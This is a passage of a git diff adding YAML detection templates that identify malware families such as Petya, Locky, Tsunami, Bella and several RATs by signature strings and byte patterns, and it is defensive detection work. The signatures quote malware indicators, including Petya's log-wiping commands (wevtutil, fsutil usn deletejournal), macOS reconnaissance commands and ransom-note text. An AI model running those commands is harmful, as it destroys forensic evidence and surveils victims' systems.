'B12AE898-D056-4378-A844-6D393FE37956' + condition: or + + - type: binary + binary: + - 'E9000000006823040000' + +# digest: 4a0a00473045022100887f3b0bb545f5a3710ed0e8ea19c1ce2ae9d7e8ba5af80161713d098c780019022038488e87fe95df609cff973f6771b681bbb74de4bbeee489a9af535c7cee7b02:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/intel-virtualization-malware.yaml b/file/malware/intel-virtualization-malware.yaml new file mode 100644 index 0000000000..17b05a7337 --- /dev/null +++ b/file/malware/intel-virtualization-malware.yaml @@ -0,0 +1,30 @@ +id: intel-virtualization-malware + +info: + name: Intel Virtualization Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Intel_Virtualization.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: binary + binary: + - '4C6F6164535452494E47' + - '496E697469616C697A654B6579486F6F6B' + - '46696E645265736F7572636573' + - '4C6F6164535452494E4746726F6D484B4355' + - '6863637574696C732E444C4C' + condition: and + + - type: binary + binary: + - '483A5C466173745C506C756728686B636D64295C' + - '646C6C5C52656C656173655C48696A61636B446C6C2E706462' + condition: and + +# digest: 490a00463044022013d609856dcbea597a8972ccf79c7efbaf74a453066aa09f49f30de2d3ca41af022047495390e0f0cff609552ada8a7e3c8310f2bfb9322a392bbdd64db5f2140688:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/iotreaper-malware.yaml b/file/malware/iotreaper-malware.yaml new file mode 100644 index 0000000000..8bed517d6a --- /dev/null +++ b/file/malware/iotreaper-malware.yaml @@ -0,0 +1,29 @@ +id: iotreaper-malware + +info: + name: IotReaper Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_IotReaper.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - 'XTALKER7' + - 'Insta11 Microsoft' + - 'wudMessage' + - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1' + - 'B12AE898-D056-4378-A844-6D393FE37956' + condition: or + + - type: binary + binary: + - 'E9000000006823040000' + +# digest: 4b0a00483046022100a92e0d01290662c6df6dc19b0f7d8dfb6cff192d7d779be40d4f4e538f28ef50022100ce06cbcf7a991b388572bcb400f680ae7af390620f3582d1586521b16fcc33ae:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/linux-aesddos-malware.yaml b/file/malware/linux-aesddos-malware.yaml new file mode 100644 index 0000000000..4904e491eb --- /dev/null +++ b/file/malware/linux-aesddos-malware.yaml @@ -0,0 +1,38 @@ +id: linux-aesddos-malware + +info: + name: Linux AESDDOS Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483 + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "3AES" + - "Hacker" + condition: and + + - type: word + part: raw + words: + - "3AES" + - "VERSONEX" + condition: and + + - type: word + part: raw + words: + - "VERSONEX" + - "Hacker" + condition: and + +# digest: 4a0a004730450221008d57442ef7f0c57e396e937805feb8e7629e470ef5ce511508a258d40756890802203363c538dea5383a8ffc67ade97c616ad2411d496a1291022fc606d4d51ae3ab:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/linux-billgates-malware.yaml b/file/malware/linux-billgates-malware.yaml new file mode 100644 index 0000000000..472501ac0c --- /dev/null +++ b/file/malware/linux-billgates-malware.yaml @@ -0,0 +1,22 @@ +id: linux-billgates-malware + +info: + name: Linux BillGates Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429 + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "12CUpdateGates" + - "11CUpdateBill" + condition: and + +# digest: 4a0a00473045022100c5a56518759e09696fefe13a0b1d3e8c20486aa77b4054d125de1a64e6b85837022048802bd37744af7ab8b8d6ee87f166f72fb7540071fc1fa66d6758f8ec308ec1:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/linux-elknot-malware.yaml b/file/malware/linux-elknot-malware.yaml new file mode 100644 index 0000000000..d45045548f --- /dev/null +++ b/file/malware/linux-elknot-malware.yaml @@ -0,0 +1,22 @@ +id: linux-elknot-malware + +info: + name: Linux Elknot Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099 + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "ZN8CUtility7DeCryptEPciPKci" + - "ZN13CThreadAttack5StartEP11CCmdMessage" + condition: and + +# digest: 4b0a00483046022100afe801591518f61980e306df3239458666a21c5efadc7b0aa21c2a37a6f4389402210090d3fcaaafb407164a8e9a1b0374ef7defe960239f59ca36767f19d0e2d72a6d:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/linux-mrblack-malware.yaml b/file/malware/linux-mrblack-malware.yaml new file mode 100644 index 0000000000..57156a04ca --- /dev/null +++ b/file/malware/linux-mrblack-malware.yaml @@ -0,0 +1,22 @@ +id: linux-mrblack-malware + +info: + name: Linux MrBlack Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483 + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "Mr.Black" + - "VERS0NEX:%s|%d|%d|%s" + condition: and + +# digest: 4b0a00483046022100e7fcb47da01265dc6d82c988665412c3c254057857d7f60e165d3b62f7e446b5022100ee15cc6c71013da15b49ef559d53b3d02d14175a0dfdfb59a251661311801bdd:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/linux-tsunami-malware.yaml b/file/malware/linux-tsunami-malware.yaml new file mode 100644 index 0000000000..4a313ecad3 --- /dev/null +++ b/file/malware/linux-tsunami-malware.yaml @@ -0,0 +1,22 @@ +id: linux-tsunami-malware + +info: + name: Linux Tsunami Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar + - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483 + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "PRIVMSG %s :[STD]Hitting %s" + - "NOTICE %s :TSUNAMI " + - "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually." + +# digest: 4a0a00473045022100b11e27e928e15e29276bad4b6c854bbac5c038ff4512449811a96c4008091e19022071292b63947f8670739933a7262c9ccfc954f74c637aad2c04f3a62857c325f9:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/locky-malware.yaml b/file/malware/locky-malware.yaml new file mode 100644 index 0000000000..52f61b360f --- /dev/null +++ b/file/malware/locky-malware.yaml @@ -0,0 +1,32 @@ +id: locky-malware + +info: + name: Locky Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Locky.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: binary + binary: + - "45b899f7f90faf45b88945b8" + - "2b0a0faf4df8894df8c745" + condition: and + + - type: binary + binary: + - "2E006C006F0063006B00790000" + - "005F004C006F0063006B007900" + - "5F007200650063006F00760065" + - "0072005F0069006E0073007400" + - "720075006300740069006F006E" + - "0073002E0074007800740000" + - "536F6674776172655C4C6F636B7900" + condition: and + +# digest: 4a0a0047304502207bf92252439de1c81b481ccc04452a42adaef5b2709cf230dfa77e1bbb0ee747022100918bbd08a177c897bd1a6e5174517e50bd150780bd831df32d7f5683d6ecbabe:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/lostdoor-malware.yaml b/file/malware/lostdoor-malware.yaml new file mode 100644 index 0000000000..46e4772da0 --- /dev/null +++ b/file/malware/lostdoor-malware.yaml @@ -0,0 +1,33 @@ +id: lostdoor-malware + +info: + name: LostDoor Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "*mlt* = %" + - "*ip* = %" + - "*victimo* = %" + - "*name* = %" + - "[START]" + - "[DATA]" + - "We Control Your Digital World" + - "RC4Initialize" + - "RC4Decrypt" + condition: and + + - type: binary + binary: + - "0D0A2A454449545F5345525645522A0D0A" + +# digest: 4a0a00473045022100f09b93e1cf30aeda8bdc4f1fe11328677f25778c788801f45f4a4a84546777bc02202dd9af3a65aa9435d840b2c25b19d4e32d7455f1549bff53adf7538a5532fed2:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/luminositylink-malware.yaml b/file/malware/luminositylink-malware.yaml new file mode 100644 index 0000000000..2afd84194a --- /dev/null +++ b/file/malware/luminositylink-malware.yaml @@ -0,0 +1,29 @@ +id: luminositylink-malware + +info: + name: LuminosityLink Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "SMARTLOGS" + - "RUNPE" + - "b.Resources" + - "CLIENTINFO*" + - "Invalid Webcam Driver Download URL, or Failed to Download File!" + - "Proactive Anti-Malware has been manually activated!" + - "REMOVEGUARD" + - "C0n1f8" + - "Luminosity" + - "LuminosityCryptoMiner" + - "MANAGER*CLIENTDETAILS*" + condition: and + +# digest: 490a004630440220014ac277fc402a628e9185fe0e76a351be65603be58b48a2c02cbdface53903e0220363eca2d5743b2c8e61fbb485e325d04ffe864d9fae151cbb0217c2d7947d111:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/luxnet-malware.yaml b/file/malware/luxnet-malware.yaml new file mode 100644 index 0000000000..29b6a9a6c4 --- /dev/null +++ b/file/malware/luxnet-malware.yaml @@ -0,0 +1,24 @@ +id: luxnet-malware + +info: + name: LuxNet Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "GetHashCode" + - "Activator" + - "WebClient" + - "op_Equality" + - "dickcursor.cur" + - "{0}|{1}|{2}" + condition: and + +# digest: 4a0a0047304502210091a15227939391bbbb1ff990efe1986b5cee3a1d222ef86e8d87c70d05cfa30e0220328b29c901b6de0f8c662a0c0ae3aa1948899b7ec24346c6679f1c9838b24e60:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/macgyver-installer-malware.yaml b/file/malware/macgyver-installer-malware.yaml new file mode 100644 index 0000000000..389b16d691 --- /dev/null +++ b/file/malware/macgyver-installer-malware.yaml @@ -0,0 +1,24 @@ +id: macgyver-installer-malware + +info: + name: MacGyver.cap Installer Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "delete -AID 315041592e5359532e4444463031" + - "install -file MacGyver.cap -nvDataLimit 1000 -instParam 00 -priv 4" + - "-mac_key 404142434445464748494a4b4c4d4e4f" + - "-enc_key 404142434445464748494a4b4c4d4e4f" + condition: and + +# digest: 490a0046304402203ec0c760923b78ea7ff2bbbbbbb5d20673c1d5c924bc45ad0586320831f2609e02207df6edc08b4f88db4f1b710d1037086d5ef37a0cf0e0c4348ce69cfb4d6e5fb9:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/macgyver-malware.yaml b/file/malware/macgyver-malware.yaml new file mode 100644 index 0000000000..9b4b7ff54d --- /dev/null +++ b/file/malware/macgyver-malware.yaml @@ -0,0 +1,27 @@ +id: macgyver-malware + +info: + name: MacGyver.cap Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "src/MacGyver/javacard/Header.cap" + - "src/MacGyver/javacard/Directory.cap" + - "src/MacGyver/javacard/Applet.cap" + - "src/MacGyver/javacard/Import.cap" + - "src/MacGyver/javacard/ConstantPool.cap" + - "src/MacGyver/javacard/Class.cap" + - "src/MacGyver/javacard/Method.cap" + condition: and + +# digest: 490a00463044022047afeb1e4cf0d671f015f766751963babcaa994464a7cd807161f6cc53f9f85702205ea23d159f7c5f930e8ac99992c1e81b82bc58fa7bf50481168e325861e4667d:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/macos-bella-malware.yaml b/file/malware/macos-bella-malware.yaml new file mode 100644 index 0000000000..fb920a2ad7 --- /dev/null +++ b/file/malware/macos-bella-malware.yaml @@ -0,0 +1,39 @@ +id: macos-bella-malware + +info: + name: Bella Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/macos/malware_macos_bella.yara + tags: malware,file,macos-bella +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "Verified! [2FV Enabled] Account ->" + - "There is no root shell to perform this command. See [rooter] manual entry." + - "Attempt to escalate Bella to root through a variety of attack vectors." + - "BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER." + condition: or + + - type: word + part: raw + words: + - "user_pass_phish" + - "bella_info" + - "get_root" + condition: and + + - type: word + part: raw + words: + - "Please specify a bella server." + - "What port should Bella connect on [Default is 4545]:" + condition: and + +# digest: 490a00463044022020ad29e486e7bd8f7024226d48a543032ac746afc8e929c68a189b2c3d312b9a02207489384ec2fcb05068a934ad391a9fcbdae8d9b1774000a5d2a643b12a2cd62a:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/madness-malware.yaml b/file/malware/madness-malware.yaml new file mode 100644 index 0000000000..8493bca3b6 --- /dev/null +++ b/file/malware/madness-malware.yaml @@ -0,0 +1,28 @@ +id: madness-malware + +info: + name: Madness DDOS Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/arbor/yara/blob/master/madness.yara + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Madness.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE" + - "TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ==" + - "document.cookie=" + - "[\"cookie\",\"" + - "\"realauth=" + - "\"location\"];" + - "d3Rm" + - "ZXhl" + condition: and + +# digest: 4a0a00473045022051f792d8fdfa305d5ab2037587778ab229d5024acc9068cb70f9980f11828e97022100c9fce5325c0373eff3477acb6ccdd1ef1e360f5382eb2bbb281a28a498d49aa3:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/miner--malware.yaml b/file/malware/miner--malware.yaml new file mode 100644 index 0000000000..d393f2309f --- /dev/null +++ b/file/malware/miner--malware.yaml @@ -0,0 +1,19 @@ +id: miner-malware + +info: + name: Miner Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XMRIG_Miner.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "stratum+tcp" + - "stratum+udp" + +# digest: 4a0a004730450220758248e479cc75a3a72cefbf3bd119a3c5a563b6e07281190431672114422cdc022100a164b67ed1b7ac223929521b51140f31f6d0ccb57dfd9f9618fb4fffbcbeeabc:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/miniasp3-malware.yaml b/file/malware/miniasp3-malware.yaml new file mode 100644 index 0000000000..820015753b --- /dev/null +++ b/file/malware/miniasp3-malware.yaml @@ -0,0 +1,60 @@ +id: miniasp3-malware + +info: + name: MiniASP3 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MiniAsp3_mem.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "open internet failed…" + condition: and + + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "run error!" + condition: and + + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "run ok!" + condition: and + + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "time out,change to mode 0" + condition: and + + - type: word + part: raw + words: + - "MiniAsp3\\Release\\MiniAsp.pdb" + - "http://%s/about.htm" + - "http://%s/result_%s.htm" + - "command is null!" + condition: and + +# digest: 4a0a00473045022100ec2ad4687e5402163e990ddb3e723d4fb30ad0a17b153eee6b4e6b4c7ce8d491022033512c2d600df63f943c3fa8cca3baee7078317444395edf1b8413d3de12f1bc:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/naikon-malware.yaml b/file/malware/naikon-malware.yaml new file mode 100644 index 0000000000..5af458ce0b --- /dev/null +++ b/file/malware/naikon-malware.yaml @@ -0,0 +1,32 @@ +id: naikon-malware + +info: + name: Naikon Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naikon.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: binary + binary: + - "0FAFC1C1E01F" + - "355A010000" + - "81C27F140600" + condition: and + + - type: word + part: raw + words: + - "NOKIAN95/WEB" + - "/tag=info&id=15" + - "skg(3)=&3.2d_u1" + - "\\Temp\\iExplorer.exe" + - "\\Temp\\\"TSG\"" + condition: or + +# digest: 4a0a0047304502207f942d475af9fbeddcd2f52d61e40cf86505078196c46b7e2764e8261194f31302210092b2c2f39c63e4c41913d29dd5c5f9f9378002c2a629ecabb3193e2c30d6e5f5:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/naspyupdate-malware.yaml b/file/malware/naspyupdate-malware.yaml new file mode 100644 index 0000000000..329087f77b --- /dev/null +++ b/file/malware/naspyupdate-malware.yaml @@ -0,0 +1,28 @@ +id: naspyupdate-malware + +info: + name: nAspyUpdate Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naspyupdate.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: binary + binary: + - "8A5424148A0132C202C28801414E75F4" + + - type: word + part: raw + words: + - "\\httpclient.txt" + - "password <=14" + - "/%ldn.txt" + - "Kill You\0" + condition: or + +# digest: 4b0a00483046022100a2a187bf7ef145fa334d95e0fddb1ccc02e4ae08f3f2f3737b415e180c6676a00221009244a5e76521882af8be71097a9b2bb6e6280decac6bb4b8b7e338a5da3eaa1c:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/notepad-malware.yaml b/file/malware/notepad-malware.yaml new file mode 100644 index 0000000000..8446a4fdf4 --- /dev/null +++ b/file/malware/notepad-malware.yaml @@ -0,0 +1,19 @@ +id: notepad-malware + +info: + name: Notepad v1.1 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Notepad.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "75BAA77C842BE168B0F66C42C7885997" + - "B523F63566F407F3834BCC54AAA32524" + +# digest: 490a004630440220585a7e0714a199acc0a4b82b123259924032a0ecd218e03ca29509d6f5b7df200220313be0feccb7edd003a682a4e55e4ff1eb1ed40e6909ce5337a4c3cb5bda0854:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/olyx-malware.yaml b/file/malware/olyx-malware.yaml new file mode 100644 index 0000000000..ecf930309f --- /dev/null +++ b/file/malware/olyx-malware.yaml @@ -0,0 +1,27 @@ +id: olyx-malware + +info: + name: Olyx Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Olyx.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "/Applications/Automator.app/Contents/MacOS/DockLight" + condition: or + + - type: binary + binary: + - "C7400436363636C7400836363636" + - "C740045C5C5C5CC740085C5C5C5C" + condition: or + +# digest: 4b0a004830460221009c75627de0e45f09b5bf2a0358d73f141011199867953d3dc66b1f43e4e6c6cf022100f3fc56b70ff4a4b743b167d94cbf8037f3eb3a5b9f76cd60dbc57a1f66bef5fb:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/osx-leverage-malware.yaml b/file/malware/osx-leverage-malware.yaml new file mode 100644 index 0000000000..04f98f203a --- /dev/null +++ b/file/malware/osx-leverage-malware.yaml @@ -0,0 +1,25 @@ +id: osx-leverage-malware + +info: + name: OSX Leverage Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_OSX_Leverage.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F" + - "+:Users:Shared:UserEvent.app:Contents:MacOS:" + - "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'" + - "osascript -e 'tell application \"System Events\" to get the hidden of every login item'" + - "osascript -e 'tell application \"System Events\" to get the name of every login item'" + - "osascript -e 'tell application \"System Events\" to get the path of every login item'" + - "serverVisible \0" + condition: and + +# digest: 490a004630440220190e234b6d0f00657ae8e6f2d79b342fccf9e1dcb9c49de77781fa21e662da7302203dbf070c64970b142d6edbcb95b55be91252dff5ef95487e3a5ce7d106aafe5a:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/paradox-malware.yaml b/file/malware/paradox-malware.yaml new file mode 100644 index 0000000000..d83e12493a --- /dev/null +++ b/file/malware/paradox-malware.yaml @@ -0,0 +1,25 @@ +id: paradox-malware + +info: + name: Paradox Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "ParadoxRAT" + - "Form1" + - "StartRMCam" + - "Flooders" + - "SlowLaris" + - "SHITEMID" + - "set_Remote_Chat" + condition: and + +# digest: 4a0a0047304502205cb43a84b5be60ac33d4401450525529ca661c5911dbe186e9b97b08cf437ca0022100b5b08da2e682f6a32b9e60236a33beadc9690a8959d876386778e5240754ad47:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/petya-malware-variant-1.yaml b/file/malware/petya-malware-variant-1.yaml new file mode 100644 index 0000000000..2f33a65e75 --- /dev/null +++ b/file/malware/petya-malware-variant-1.yaml @@ -0,0 +1,24 @@ +id: petya-malware-variant-1 + +info: + name: Petya Malware (Variant 1) - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara + tags: malware,file,petya +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "Ooops, your important files are encrypted." + - "Send your Bitcoin wallet ID and personal installation key to e-mail" + - "wowsmith123456@posteo.net. Your personal installation key:" + - "Send $300 worth of Bitcoin to following address:" + - "have been encrypted. Perhaps you are busy looking for a way to recover your" + - "need to do is submit the payment and purchase the decryption key." + condition: or + +# digest: 4b0a0048304602210084c742f95c8f61e60f9d2a9beb267e5daaec072b3fd36ccc733a70e01f2d1c9b02210086b0e7826a6055cca4010e7d175a1d1796e92e78392461f81c8ad5ce12d4d40e:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/petya-malware-variant-3.yaml b/file/malware/petya-malware-variant-3.yaml new file mode 100644 index 0000000000..e9fc484a5f --- /dev/null +++ b/file/malware/petya-malware-variant-3.yaml @@ -0,0 +1,20 @@ +id: petya-malware-variant-3 + +info: + name: Petya Malware (Variant 3) - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara + tags: malware,file,petya +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "wevtutil cl Setup & wevtutil cl System" + - "fsutil usn deletejournal /D %c:" + condition: or + +# digest: 490a0046304402200a5ce8456fd9e33848656de116ea8e935df34a4ec5bf5e18fc01dede3b0d5fd0022049187c34d01316789d0b3dca3ca9166a4543374e0243b654cee0dda079071867:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/petya-malware-variant-bitcoin.yaml b/file/malware/petya-malware-variant-bitcoin.yaml new file mode 100644 index 0000000000..f291586656 --- /dev/null +++ b/file/malware/petya-malware-variant-bitcoin.yaml @@ -0,0 +1,18 @@ +id: petya-malware-variant-bitcoin + +info: + name: Petya Malware (Variant Bitcoin) - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara + tags: malware,file,petya +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB" + +# digest: 4b0a00483046022100ca5946dce3e94679c1ef8d9d8b05b3e1e06086777d2e5a379d7742016c24bbf8022100f33cec782c1929a868debd0fa962536a8606e1ff273092979a250752d22956e7:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/plasma-malware.yaml b/file/malware/plasma-malware.yaml new file mode 100644 index 0000000000..0d694d0fbc --- /dev/null +++ b/file/malware/plasma-malware.yaml @@ -0,0 +1,27 @@ +id: plasma-malware + +info: + name: Plasma Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "Miner: Failed to Inject." + - "Started GPU Mining on:" + - "BK: Hard Bot Killer Ran Successfully!" + - "Uploaded Keylogs Successfully!" + - "No Slowloris Attack is Running!" + - "An ARME Attack is Already Running on" + - "Proactive Bot Killer Enabled!" + - "PlasmaRAT" + - "AntiEverything" + condition: and + +# digest: 4a0a004730450221008eb65f1513c0e2aef9d97696947b1a4ff2b56632eb8996690e2974b945c6683e02201633a82d34627d923130fb638757d0c5c9b78f2228ce4c8ef9d44982f38db553:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/poetrat-malware.yaml b/file/malware/poetrat-malware.yaml new file mode 100644 index 0000000000..27cdc296aa --- /dev/null +++ b/file/malware/poetrat-malware.yaml @@ -0,0 +1,35 @@ +id: poetrat-malware + +info: + name: PoetRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_PoetRATDoc.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "launcher.py" + - "smile.zip" + - "smile_funs.py" + - "frown.py" + - "backer.py" + - "smile.py" + - "affine.py" + - "cmd" + - ".exe" + condition: and + + - type: regex + regex: + - '(\.py$|\.pyc$|\.pyd$|Python)' + - '\.dll' + condition: and + +# digest: 4b0a00483046022100e09de2e10a3630983f1b2249a132629deeece25a89ffbf24c61a86058313df150221009fed290461f94ccf057c69f612a3356f50ea91833fc67e7666e1d3e22133abf0:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/pony-malware.yaml b/file/malware/pony-malware.yaml new file mode 100644 index 0000000000..fde67d529d --- /dev/null +++ b/file/malware/pony-malware.yaml @@ -0,0 +1,22 @@ +id: pony-malware + +info: + name: Pony Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Pony.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" + - "YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0" + - "POST %s HTTP/1.0" + - "Accept-Encoding: identity, *;q=0" + condition: and + +# digest: 4b0a00483046022100d1488f9b654f6e62deb05f5d8aff7165d3f6bab59d11f4e9ea5753f549b4edf6022100f8b660933458693e2ff78b7f6f74e225837fb47e6dd535acb6946e7ef617c4e4:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/pony-stealer-malware.yaml 